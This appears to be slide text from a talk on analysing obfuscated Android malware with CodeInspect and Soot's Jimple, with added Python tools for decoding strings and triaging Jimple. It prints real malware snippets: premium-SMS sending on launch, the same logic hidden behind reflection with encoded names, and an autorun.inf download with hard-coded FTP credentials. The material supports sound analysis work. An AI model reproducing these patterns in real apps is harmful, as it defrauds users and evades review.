Analyzing Sophisticated Android Malware with CodeInspect

Siegfried Rasthofer, Secure Software Engineering Group

Posted on 05-Jun-2020

#whoami

• 3rd year PhD student at the Secure Software Engineering Group, Darmstadt, Germany (Prof. Dr. Eric Bodden)
• Research interests:
  • Applied software security on Android
  • Static/dynamic code analyses
• Android security:
  • Found 2 AOSP exploits
  • Korea threat investigation together with McAfee Research Lab / Intel Security

Malware

public void onCreate(android.os.Bundle $param0) {
    // Three text messages are sent as soon as the component is created,
    // with no user interaction. Argument order of SmsManager.sendTextMessage:
    // destination address, service-centre address, text, sent intent, delivery intent.
    sendTextMessage("3353", null, "798657", null, null);
    sendTextMessage("3354", null, "798657", null, null);
    sendTextMessage("3353", null, "798657", null, null);
}

public static boolean gdadbjrj(String paramString1, String paramString2) throws Exception
{
    // Same behaviour as above, but every class and method name is an encoded
    // string literal that gdadbjrj.gdadbjrj(String) decodes at run time and
    // that is then resolved via reflection, so neither the class nor the
    // method name appears as a plain string in the APK.
    Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af"));
    // static no-argument factory method on that class
    Object localObject = clz.getMethod(gdadbjrj.gdadbjrj("]a9maFVM.9"), new Class[0]).invoke(null, new Object[0]);
    String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a");
    // parameter type of the last two arguments
    Class c = Class.forName(gdadbjrj.gdadbjrj("VRIf3+InVTTnSaRI+R]KR9aR9"));
    // nglpsq.cbhgc: obfuscated static field holding the parameter type of the
    // first three arguments (presumably String.class, given the call below)
    Class[] arr = new Class[] { nglpsq.cbhgc, nglpsq.cbhgc, nglpsq.cbhgc, c, c };
    clz.getMethod(s, arr).invoke(localObject, new Object[] { paramString1, null, paramString2, null, null });
    return true;
}


Typical anti-analysis techniques found in such samples:
- Reflection
- Packers
- Anti-decompile
- Anti-debug
- …
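The reflection-based sender above resolves every class and method name through gdadbjrj.gdadbjrj(String), whose body is not on the slide. Below is an added example (not code from the slides or from CodeInspect) of how an analyst can recover such a string decoder without reversing it. It assumes the decoder is a per-character substitution; one confident guess for the class name (android.telephony.SmsManager, inferred from the shape of the call: a static no-argument factory followed by a five-argument instance method whose last two parameters share a type) yields most of the table, the partially decoded remaining literals are then read as getDefault, sendTextMessage and android.app.PendingIntent, and each reading is checked for consistency with the table before it is merged. The substitution assumption and the guessed plaintexts are the analyst's, not facts stated on the slide.

```python
"""Known-plaintext recovery of a per-character string-obfuscation table.

Added example, not code from the slides or from CodeInspect. The four
ciphertext literals are copied from the reflection-based SMS sender on the
"Malware" slide. gdadbjrj.gdadbjrj(String) itself is not shown, so this
script ASSUMES it is a monoalphabetic substitution (each ciphertext
character always decodes to the same plaintext character). Under that
assumption one confident guess recovers most of the table, and every
further guess can be checked for consistency before it is accepted.
"""
from typing import Dict, Iterable, Optional, Tuple

# Ciphertext literals exactly as they appear on the slide.
OBFUSCATED: Dict[str, str] = {
    "class":  "VRIf3+In9a.aTA3RYnD1BcVRV]af",  # Class.forName(...)
    "getter": "]a9maFVM.9",                     # static no-arg factory
    "method": "BaRIta*9caBBV]a",                # 5-arg instance method
    "param":  "VRIf3+InVTTnSaRI+R]KR9aR9",      # type of args 4 and 5
}

# Analyst's guess (assumption): a class obtained via a static no-arg factory
# and then called with (String, String, String, X, X) is
# SmsManager.getDefault().sendTextMessage(...). Start from the class name.
FIRST_GUESS: Tuple[str, str] = (OBFUSCATED["class"], "android.telephony.SmsManager")


def build_table(pairs: Iterable[Tuple[str, str]],
                table: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Derive (or extend) the cipher->plain table from known-plaintext pairs.

    Raises ValueError when a pair contradicts the substitution assumption:
    a cipher char that would need two plaintexts, or two cipher chars that
    would produce the same plaintext (the mapping must be a bijection).
    """
    table = dict(table or {})
    for cipher, plain in pairs:
        if len(cipher) != len(plain):
            raise ValueError("length mismatch: %r vs %r" % (cipher, plain))
        for c, p in zip(cipher, plain):
            if table.setdefault(c, p) != p:
                raise ValueError("%r maps to both %r and %r" % (c, table[c], p))
    inverse: Dict[str, str] = {}
    for c, p in table.items():
        if inverse.setdefault(p, c) != c:
            raise ValueError("plaintext %r produced by %r and %r" % (p, inverse[p], c))
    return table


def is_consistent(pairs: Iterable[Tuple[str, str]],
                  table: Optional[Dict[str, str]] = None) -> bool:
    """True if the guesses can coexist with each other and the current table."""
    try:
        build_table(pairs, table)
        return True
    except ValueError:
        return False


def decode(cipher: str, table: Dict[str, str]) -> str:
    """Decode with the table; characters not yet recovered become '?'."""
    return "".join(table.get(c, "?") for c in cipher)


def decode_all(table: Dict[str, str]) -> Dict[str, str]:
    return {name: decode(lit, table) for name, lit in OBFUSCATED.items()}


def recover() -> Tuple[Dict[str, str], Dict[str, str], Dict[str, str]]:
    """Two rounds: one guess, read the gaps, confirm the remaining literals."""
    round1 = build_table([FIRST_GUESS])
    partial = decode_all(round1)          # e.g. getter -> "get?e?a?lt"
    # Round 2: the gaps in the partial decodes are filled by reading them as
    # the obvious Android identifiers. Each reading is checked against round 1
    # before it is accepted, so a wrong reading is rejected, not silently merged.
    round2 = build_table([
        (OBFUSCATED["getter"], "getDefault"),
        (OBFUSCATED["method"], "sendTextMessage"),
        (OBFUSCATED["param"],  "android.app.PendingIntent"),
    ], round1)
    return partial, decode_all(round2), round2


if __name__ == "__main__":
    partial, full, _ = recover()
    for name in OBFUSCATED:
        print("%-6s %-28s %s" % (name, partial[name], full[name]))
```

If the decoder were anything other than a plain substitution (position-dependent, keyed per call site), build_table would reject the second-round readings; that rejection is the signal to stop guessing and instead evaluate gdadbjrj.gdadbjrj under a debugger on the device.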

A new binary analysis framework for Android and Java bytecode

Soot

Input/Output: .dex, .apk, .class, .java, .jimple
- Various call-graph algorithms
- Sophisticated algorithms used in compiler construction
- Code manipulation

https://github.com/Sable/soot/wiki

Jimple, the intermediate representation used by Soot

public static boolean UsbAutoRunAttack(android.content.Context $param0)
{
    java.lang.String $String;

    $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>;
    ...
    staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)>($String, "autorun.inf", "ftpupper", "thisisshit007", $param0);

    return true;
}

The slide marks the three parts of a Jimple method body: the local declarations ($String), the code (typed three-address statements with fully qualified field and method references) and the return statement. Because every call site spells out the complete callee signature and its constant arguments, the downloaded file name (autorun.inf, fetched from the server stored in Tools.urlServer) and the hard-coded credential-looking strings ("ftpupper", "thisisshit007") are visible directly in the Jimple, without decompiling to Java.
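As an added example (not from the slides, nor from Soot or CodeInspect), a small Python triage script for Jimple of the kind shown above: it parses invoke statements, lists the callee signatures and reports the literal arguments that reach them. SAMPLE_JIMPLE is constructed here: the DownloadFile statement is copied from the slide, while the two SmsManager statements are hand-written Jimple for the onCreate() SMS sender from the Malware slide and are an assumption about what that code compiles to.

```python
"""Parse Jimple invoke statements and pull out hard-coded arguments.

Added example, not part of the slides or of Soot/CodeInspect. In Jimple
every call site is a single statement of the form
    [$local =] <kind>invoke [$base.]<Class: ret name(ptypes)>(args);
so a line-based parser can list callee signatures and the constants that
reach them. SAMPLE_JIMPLE is constructed: the DownloadFile call is copied
from the UsbAutoRunAttack body on the slide; the SmsManager calls are
hand-written Jimple for the onCreate() SMS sender (assumption).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_JIMPLE = r'''
$String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>;
staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)>($String, "autorun.inf", "ftpupper", "thisisshit007", $param0);
$r1 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();
virtualinvoke $r1.<android.telephony.SmsManager: void sendTextMessage(java.lang.String, java.lang.String, java.lang.String, android.app.PendingIntent, android.app.PendingIntent)>("3353", null, "798657", null, null);
'''

# kind, optional receiver local, <class: ret name(params)>, (args)
INVOKE_RE = re.compile(
    r'(?P<kind>static|virtual|special|interface)invoke\s+'
    r'(?:(?P<base>\$?\w+)\.)?'
    r'<(?P<cls>[^:]+):\s+(?P<ret>\S+)\s+(?P<name>[^\s(]+)\((?P<params>[^)]*)\)>'
    r'\((?P<args>.*)\)\s*;?\s*$')


@dataclass
class Invoke:
    kind: str
    base: Optional[str]      # receiver local for instance calls, None for static
    cls: str
    ret: str
    name: str
    params: List[str]
    args: List[str]

    @property
    def signature(self) -> str:
        return "<%s: %s %s(%s)>" % (self.cls, self.ret, self.name, ", ".join(self.params))

    def string_constants(self) -> List[Tuple[str, str]]:
        """(parameter type, value) for every argument that is a string literal."""
        out = []
        for ptype, arg in zip(self.params, self.args):
            if len(arg) >= 2 and arg[0] == '"' and arg[-1] == '"':
                out.append((ptype, arg[1:-1]))
        return out


def split_args(s: str) -> List[str]:
    """Split an argument list on commas, but not on commas inside string literals."""
    args, cur, in_str, esc = [], [], False, False
    for ch in s:
        if in_str:
            cur.append(ch)
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            cur.append(ch)
        elif ch == ",":
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        args.append(tail)
    return args


def parse_invokes(jimple: str) -> List[Invoke]:
    found = []
    for line in jimple.splitlines():
        m = INVOKE_RE.search(line)
        if not m:
            continue   # field refs, assignments, returns, ... are not call sites
        params = [p.strip() for p in m.group("params").split(",") if p.strip()]
        found.append(Invoke(m.group("kind"), m.group("base"), m.group("cls"),
                            m.group("ret"), m.group("name"), params,
                            split_args(m.group("args"))))
    return found


def sms_destinations(invokes: List[Invoke]) -> List[str]:
    """Literal destination numbers handed to SmsManager.send*(...)."""
    return [inv.args[0][1:-1] for inv in invokes
            if inv.cls == "android.telephony.SmsManager"
            and inv.name.startswith("send") and inv.args
            and inv.args[0].startswith('"')]


if __name__ == "__main__":
    calls = parse_invokes(SAMPLE_JIMPLE)
    for inv in calls:
        print(inv.signature, inv.string_constants())
    print("SMS destinations:", sms_destinations(calls))
```

Against the obfuscated sample from the Malware slide this finds nothing, since the interesting call is `java.lang.reflect.Method.invoke` with encoded literals; that gap is exactly why the deobfuscation step has to come first.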

CodeInspect builds on Soot and its Jimple representation.

CodeInspect features:
- Jimple code
- Readable files
- Code refactoring
- Debugger
- Java source enhancement
- Syntax highlighting
- Code manipulation
- Dataflow visualizer
- Deobfuscator
- "Region" detection

Let's get started…

1. Import APK
2. Start device

Android/BadAccents (banking Trojan)

[Slide diagram: the Trojan's activation component with its triggers and actions. Labels: SMS, HTTP, E-Mail; Intercept SMS, Intercept Call; Install Fake AV, Uninstall AV; File System, Native Code; User; Waiting Time; Send SMS; App Internal, External Event, Environment Settings.]

Reference: An Investigation of the Android/BadAccents Malware which Exploits a new Android Tapjacking Attack. Siegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden.

Live demo: https://goo.gl/LblcR5

Future steps

• New plugins under development
• Easily add your own analyses
• What would be a useful feature for you?

How do I get this tool?

Siegfried Rasthofer, Secure Software Engineering Group
Email: siegfried.rasthofer@cased.de
Blog: http://sse-blog.ec-spride.de
Website: http://sse.ec-spride.de
Twitter: @CodeInspect